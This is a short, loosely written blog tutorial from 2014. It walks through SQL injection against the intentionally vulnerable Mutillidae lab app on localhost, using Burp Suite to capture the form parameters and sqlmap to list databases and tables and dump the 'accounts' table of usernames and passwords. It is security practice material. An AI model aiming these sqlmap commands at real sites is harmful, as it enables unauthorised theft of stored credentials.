Senin, 27 Januari 2014

Sqlmap : POST - GETH parameter in Mutillidae

here we up...lets practice to Injection

Run apache and mysql
Run bwoser Mantra
set Proxy localhost port 8080

goto url localhost/mutillidae

and go to OWASP To 10 >SQL Injection > SQLi Baypass Autentication>Login
Run burpsuite make sure intercept is on

POST Parameter 
type on form :
Name : admin and password: password 

cek on burpsuite...
look at the last bar,, “username=admin&password=1234&login-php-submit-button=Login” it wii be enumere use POST parameter 

copy url tu set -u option in sqlmap and parameter post get from burpsuite

sqlmap# ./ -u http://localhost/mutillidae/index.php?page=login.php –data="username=admin&password=1234&login-php-submit-button=Login" --dbs

any question to unsware couse there multiple injection points,
0 Post parameter username
1 Post paramater password
type 0 and than Y

 --dbs : enumeret DBMS database

/sqlmap# ./ -u http://localhost/mutillidae/index.php?page=login.php --data="username=admin&password=1234&login-php-submit-button=Login" -D nowasp --tables 


-D nowasp :
--tables :

we want to get password and user, so we mast enumere “account” table

/sqlmap# ./ -u http://localhost/mutillidae/index.php?page=login.php --data="username=admin&password=1234&login-php-submit-button=Login" -T accounts --dump

-T accounts

cek one of user and password dump

Parameter GET

/sqlmap# ./ -u "localhost/mutillidae/index.php?page=user-info.php&username=aaa&password=123&user-info-php-submit-button=View+Account+Details" --dbs 

/sqlmap# ./ -u "localhost/mutillidae/index.php?page=user-info.php&username=aaa&password=123&user-info-php-submit-button=View+Account+Details" -D nowasp --tables

/sqlmap# ./ -u "localhost/mutillidae/index.php?page=user-info.php&username=aaa&password=123&user-info-php-submit-button=View+Account+Details" -T accounts --dump

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